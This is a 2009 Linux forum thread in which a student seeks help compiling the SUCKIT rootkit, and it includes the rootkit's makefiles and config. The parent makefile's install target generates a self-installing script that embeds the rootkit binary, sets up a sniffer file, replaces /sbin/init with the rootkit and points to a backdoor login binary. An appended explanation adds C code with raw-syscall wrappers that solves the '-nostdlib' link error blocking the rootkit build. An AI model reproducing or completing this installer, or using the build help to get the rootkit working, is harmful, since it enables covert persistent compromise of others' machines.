11-16-2009 #1 Just Joined! (Join Date: Nov 2009; Location: Ewing; Posts: 5)
Rootkit Help
Hi,
I am currently working on understanding the SUCKIT rootkit for a research project, not for malicious use. Unfortunately, I can't get it to compile to further my research because I am getting the error "undefined reference to 'read'" and other system calls. I checked to make sure that the necessary headers are included and they are. I don't think I need to install anything for Ubuntu 9.04 for C programming because I tried a simpler program first and it worked fine. Does anyone have any suggestions?
Thanks.
11-17-2009 #2 Linux Guru (Join Date: Apr 2009; Location: I can be found either 40 miles west of Chicago, or in a galaxy far, far away; Posts: 8,975)
People working on malware have no reasonable expectation of help here. JMHO... In any case, even if it is for "research" (remember what happened with the Morris worm back in the 80's - a research project that inadvertently got into the wild), if you cannot debug your build environment and the code you are trying to use, then you aren't qualified for this work. If you do succeed in building this rootkit, you and others are likely to "enjoy" unanticipated "benefits".
Sometimes, real fast is almost as good as real time.
Just remember, Semper Gumbi - always be flexible!
11-17-2009 #3 Linux Guru (Join Date: Apr 2009; Location: I can be found either 40 miles west of Chicago, or in a galaxy far, far away; Posts: 8,975)
Speaking of unanticipated results from a programming project, here's one that effectively shut down a billion $ company's network, and in that case there was no intent on building/distributing malware. Some engineers in my company's Korean division built some network communication software that used the commercial TIBCO Rendezvous message bus. Unfortunately, in their error recovery code there was a bug that would result in a ramping volume of network-wide broadcast messages, resulting in what was in effect a denial of service attack on the network. Every few days, this code would have the bad error handling function triggered, and in an hour or so the entire network would be shut down until the offending servers were rebooted. The trigger was a client being shut down without disconnecting from the service - the result of a 3-finger salute when the client system would seem to take too long in getting the results of a transaction request. Needless to say, our major customers who were using this code weren't very happy - shutting down a semiconductor plant runs into losses of million$ per hour. Caveat developer!
11-22-2009 #4 Just Joined! (Join Date: Nov 2009; Location: Ewing; Posts: 5)
First of all, you don't know who reads these forums because, as it turns out, you don't know everything. Get off your high horse and share some knowledge with others. You shouldn't assume that you know what you're talking about because it turns out you don't know everything. I am working on a laptop that cannot connect to the Internet on purpose. I figure I could destroy the operating system on that computer without risk to the world. But I thank you for thinking less of me because I have never actually used a makefile before and was looking for a bit of help. As for your comment about unexpected results, that would be great because lots of things that you enjoy today have come from unexpected results, like Post-it notes. Have fun criticising others who are interested in learning and are not at your expertise yet... Thanks for nothing.
11-22-2009 #5 Linux Guru (Join Date: Apr 2009; Location: I can be found either 40 miles west of Chicago, or in a galaxy far, far away; Posts: 8,975)
I'm just saying that there is a certain basic level of understanding required for the sort of "research" you say you want to pursue. Because of the fundamentally elementary level of problems you are experiencing, it is only natural that I assume you don't have the requisite knowledge yet to pursue this endeavor. I stand by this, and don't expect help from me until you can "bootstrap" yourself to a bit better ability to build/run software on Linux/Unix systems.
11-22-2009 #6 Just Joined! (Join Date: Nov 2009; Location: Ewing; Posts: 5)
It's not "research", it's research. I have a professor as my mentor who is not much help on this. I mean, I think that I have a basic understanding of how to build and run software. My real issue is that I'm using a makefile I did not create and encountering the "undefined reference" error I stated before, and I was hoping that someone who wasn't so arrogant would help a struggling college student get a good grade, but whatever, I'll do it myself. By the way, how can I learn something specific if people like you refuse to enlighten me?
11-22-2009 #7 Linux Guru (Join Date: Apr 2009; Location: I can be found either 40 miles west of Chicago, or in a galaxy far, far away; Posts: 8,975)
Well, let's just get down to the basics of building/linking software, and leave the "hot button" issue of research into rootkits out of the conversation then, ok?
When the linker complains about missing symbols such as read, write, etc., it means that the LDFLAGS makefile variable is likely missing a library directive. These functions are usually found in the libc library, which should be automatically linked, but it is possible that the makefile is constructed such that it is not being linked properly, or at all. To help with this, please attach the makefile here and I'll see what I can tell you about how to fix it.
11-22-2009 #8 Linux Guru (Join Date: Apr 2009; Location: I can be found either 40 miles west of Chicago, or in a galaxy far, far away; Posts: 8,975)
Also, please provide information about the distribution+version of Linux you are running, such as Ubuntu 9.04, as well as the version of gcc you are using. You can get the gcc version information with the command: gcc --version
11-22-2009 #9 Linux Guru (Join Date: Apr 2009; Location: I can be found either 40 miles west of Chicago, or in a galaxy far, far away; Posts: 8,975)
Also, I apologize for my initial attitude. However, your initial posting led me to believe that you were a "script kiddie" or similar looking for help, and that's not something I am particularly keen about doing.
11-24-2009 #10 Just Joined! (Join Date: Nov 2009; Location: Ewing; Posts: 5)
Yeah, I guess I gave that impression, but that is definitely not my intention. I'm actually trying to figure out how to prevent such rootkits from attacking a Linux computer. But anyway, the makefile is below and the version of gcc is 4.3.3. I'm not sure if this makes a difference, but I saw in the code of the rootkit that the author tries to replace libc, or at least modify it for his own code. Could this be a potential problem if the real libc and the fake one are not both linked to the file? I've already looked at my .bashrc file and I'm pretty sure that I don't have to add a path for the libraries on my computer because I was able to compile the short hello world C program. The first makefile is the one in the parent folder and the second is the one in the source code folder. I've also included the configure file that it says it calls. Within the makefiles, it creates a script so that a person can upload it to the target computer, so there are some extra instructions. I really appreciate your help with this.
Parent makefile:
#
# $Id: Makefile, just a makefile, whatever
# Btw, if you have any idea on how to prove that, drop me a line.
# You see ... I'm really not a make guru
# -sd

include config

INST = inst

all: install

help:
	@echo "Targets:"
	@echo "make sk - build sk & login binary"
	@echo "make help - this help"
	@echo "make skconfig - configure sk"
	@echo "make install - create install script"

install: include/config.h sk
	@echo "Creating install script"
	echo "#!/bin/bash" > $(INST)
	echo "D=`cat include/config.h | grep HOME | awk {'print $$3'}`" >> $(INST)
	echo "H=`cat include/config.h | grep HIDESTR | awk {'print $$3'}`" >> $(INST)
	echo "mkdir -p \$$D; cd \$$D" >> $(INST)
	echo "echo > .sniffer; chmod 0622 .sniffer" >> $(INST)
	echo "echo -n -e `gzip -9 -c sk | src/bin2oct` | gzip -d > sk" >> $(INST)
	echo "chmod 0755 sk; if [ ! -f /sbin/init\$${H} ]; " \
	     "then cp -f /sbin/init /sbin/init\$${H}; fi;" \
	     "rm -f /sbin/init; cp sk /sbin/init" >> $(INST)
	@echo "echo Your home is \$$D, go there and type ./sk to install" >> $(INST)
	@echo "echo us into memory. Have fun!" >> $(INST)
	@echo
	@echo "Okay, file '$(INST)' is complete, self-installing script."
	@echo "Just upload it somewhere, execute and you could log in using"
	@echo "./login binary."
	@echo
	@echo "Have fun!"

skconfig: clean src/pass
	@clear
	@src/pass >> include/config.h
	@echo
	@echo "Configuration saved."
	@echo "From now, _only_ this configuration will be used by generated"
	@echo "binaries till you do skconfig again."
	@echo
	@echo "To (re)build all of stuff type 'make'"

include/config.h:
	@echo
	@echo Please do \`make skconfig\` in top level directory to generate configuration file.
	@echo
	@exit 1

sk: include/config.h src/sk src/bin2oct login
	cp -f src/sk sk

login: src/login
	cp -f src/login login

src/sk: src include
	@(make -C $(SRC) )

src/login: src include
	@(make -C $(SRC) login)

src/pass: src include
	@(make -C $(SRC) pass)

src/bin2oct: src include
	@(make -C $(SRC) bin2oct)

clean:
	rm -f include/config.h sk login inst
	@(make -C $(SRC) clean )
Source makefile:
#
# $Id: Makefile, just a makefile, whatever
# Btw, if you have any idea on how to prove that, drop me a line.
# You see ... I'm really not a make guru
# -sd

include ../config

all: login pass
	rm -f sk kernel.o
	make sk

obj: ../include/config.h $(OBJS)
	@if test -z "$(OBJS)"; then make obj OBJS="`echo [^z]*.c | sed 's/\.c/.o/g'`";fi;

../include/config.h:
	@echo
	@echo Please do \`make skconfig\` in top level directory to generate configuration file.
	@echo
	@exit 1

sk: obj
	gcc -s -nostdlib *.o -o sk

kernel.o:
	@echo ".data" > kernel.s
	@echo "kernel_start:" >> kernel.s
	gcc -S $(CFLAGS) kernel.c -o - | grep -vE "\.align|\.p2align|\.text|\.data|\.rodata|#|\.ident|\.file|\.version" >> kernel.s
	@echo "kernel_end:" >> kernel.s
	gcc -c kernel.s

login: zlogin.c sha1.o crypto.o
	$(CC) $(CFLAGS) $(LDFLAGS) zlogin.c sha1.o crypto.o -o login

pass: zpass.c sha1.o crypto.o
	$(CC) $(CFLAGS) $(LDFLAGS) zpass.c sha1.o crypto.o -o pass

bin2oct: zbin2oct.c
	$(CC) $(CFLAGS) $(LDFLAGS) zbin2oct.c -o bin2oct

clean:
	@(rm -f *.o sk login *.s core pass bin2oct)
Configure file:
#
# $Id: config, common config for all makefiles
#

# escape character - ^K by default
ECHAR = 0x0b

# directories
INCLUDE = include
SRC = src
VER = 1.3a

# files
BINARY = sk

# compile flags
CC = gcc
LD = ld
CFLAGS = -Wall -O2 -fno-unroll-all-loops \
	-I../$(INCLUDE) -I../$(ARCH) -DECHAR=$(ECHAR)
LDFLAGS = -s

.c.o:
	$(CC) $(CFLAGS) -c $<
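The linker point made in post #7 and the `gcc -s -nostdlib *.o -o sk` line in the source makefile above go together: `-nostdlib` tells gcc to link neither the C runtime start files nor libc, so `read`, `write` and every other libc function the sources call must be defined inside the project's own object files or the link fails with exactly "undefined reference to `read'". No `-l` flag in LDFLAGS changes that, and it is consistent with what the poster describes as the author replacing libc. The following is an added example written for this page, not SUCKIT's code, showing the technique in its smallest form: raw Linux system calls through inline assembly, a self-test that round-trips data through a pipe using only those wrappers, and a `_start` entry point for the `-nostdlib` build. It assumes x86-64 or aarch64 Linux; the `rk_*` names, the `FREESTANDING` macro and the file name `sysnolibc.c` are invented for this example.

```c
/* sysnolibc.c - added example, not part of SUCKIT. Raw Linux syscall
 * wrappers so a binary linked with `gcc -nostdlib` resolves read/write
 * without libc. Assumes x86-64 or aarch64 Linux; rk_* names are invented.
 *
 * Hosted build (libc present, main() runs):
 *   gcc -O2 -Wall sysnolibc.c -o demo
 * Freestanding build (what a -nostdlib link has to provide for itself):
 *   gcc -O2 -Wall -static -nostdlib -fno-stack-protector -DFREESTANDING sysnolibc.c -o demo
 */

#if defined(__x86_64__)
#  define NR_read   0
#  define NR_write  1
#  define NR_pipe2  293
#  define NR_exit   60
/* x86-64 ABI: nr in rax, args in rdi/rsi/rdx; kernel clobbers rcx and r11 */
static long raw_syscall3(long nr, long a, long b, long c)
{
    long ret;
    __asm__ volatile ("syscall"
                      : "=a"(ret)
                      : "a"(nr), "D"(a), "S"(b), "d"(c)
                      : "rcx", "r11", "memory");
    return ret;                      /* negative value means -errno */
}
#elif defined(__aarch64__)
#  define NR_read   63
#  define NR_write  64
#  define NR_pipe2  59
#  define NR_exit   93
/* aarch64 ABI: nr in x8, args in x0..x2, result back in x0 */
static long raw_syscall3(long nr, long a, long b, long c)
{
    register long x8 __asm__("x8") = nr;
    register long x0 __asm__("x0") = a;
    register long x1 __asm__("x1") = b;
    register long x2 __asm__("x2") = c;
    __asm__ volatile ("svc #0"
                      : "+r"(x0)
                      : "r"(x8), "r"(x1), "r"(x2)
                      : "memory");
    return x0;
}
#else
#  error "example only covers x86-64 and aarch64 Linux"
#endif

/* The wrappers a -nostdlib build must supply itself. In a real freestanding
 * tree they would be named read/write/etc. so that existing call sites link. */
long rk_read(int fd, void *buf, unsigned long n)        { return raw_syscall3(NR_read,  fd, (long)buf, (long)n); }
long rk_write(int fd, const void *buf, unsigned long n) { return raw_syscall3(NR_write, fd, (long)buf, (long)n); }
long rk_pipe(int fds[2])                                { return raw_syscall3(NR_pipe2, (long)fds, 0, 0); }
void rk_exit(int code)                                  { for (;;) raw_syscall3(NR_exit, code, 0, 0); }

/* Round-trip a constructed message through a pipe using only the raw
 * wrappers. Returns 1 on success, 0 on failure. Byte comparison is done
 * by hand so the compiler never emits a call to memcmp (absent without libc). */
int rk_selftest(void)
{
    static const char msg[] = "sk";  /* constructed sample payload */
    char got[sizeof msg];
    int fds[2];
    unsigned long i;

    if (rk_pipe(fds) < 0)
        return 0;
    if (rk_write(fds[1], msg, sizeof msg) != (long)sizeof msg)
        return 0;
    if (rk_read(fds[0], got, sizeof got) != (long)sizeof got)
        return 0;
    for (i = 0; i < sizeof msg; i++)
        if (got[i] != msg[i])
            return 0;
    return 1;
}

#ifdef FREESTANDING
/* Without crt1.o there is no libc main() caller: we are the entry point and
 * must exit via the syscall rather than return. */
#if defined(__x86_64__)
__attribute__((force_align_arg_pointer))
#endif
void _start(void)
{
    rk_exit(rk_selftest() ? 0 : 1);
}
#else
int main(void)
{
    static const char ok[] = "raw syscalls OK\n", bad[] = "raw syscalls FAILED\n";
    if (rk_selftest())
        rk_write(1, ok, sizeof ok - 1);
    else
        rk_write(1, bad, sizeof bad - 1);
    return 0;
}
#endif
```

In the freestanding form, changing any call in `rk_selftest` to plain `read()` or `write()` reproduces the poster's "undefined reference" error, because nothing on that link line defines those symbols; that is the quickest check to tell a missing wrapper apart from a missing `-l` flag. Raw syscalls return `-errno` rather than setting a global `errno`, which is why the wrappers test for negative values directly.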